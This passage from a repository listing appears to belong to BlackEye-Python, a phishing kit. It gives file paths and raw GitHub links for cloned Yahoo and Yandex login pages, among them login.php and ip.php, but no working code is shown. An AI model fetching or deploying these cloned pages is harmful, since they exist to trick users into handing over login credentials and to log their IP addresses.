https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/yahoo/yahoo_files/boot.js -------------------------------------------------------------------------------- /sites/yahoo/yahoo_files/client.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/yahoo/yahoo_files/client.php -------------------------------------------------------------------------------- /sites/yahoo/yahoo_files/g-r-min.js: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/yahoo/yahoo_files/g-r-min.js -------------------------------------------------------------------------------- /sites/yahoo/yahoo_files/r-csc.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/yahoo/yahoo_files/r-csc.html -------------------------------------------------------------------------------- /sites/yahoo/yahoo_files/yahoo_en-US_f_p_bestfit_2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/yahoo/yahoo_files/yahoo_en-US_f_p_bestfit_2x.png -------------------------------------------------------------------------------- /sites/yandex/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /sites/yandex/ip.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/yandex/ip.php -------------------------------------------------------------------------------- /sites/yandex/login.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/yandex/login.html -------------------------------------------------------------------------------- /sites/yandex/login.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/M4cs/BlackEye-Python/HEAD/sites/yandex/login.php --------------------------------------------------------------------------------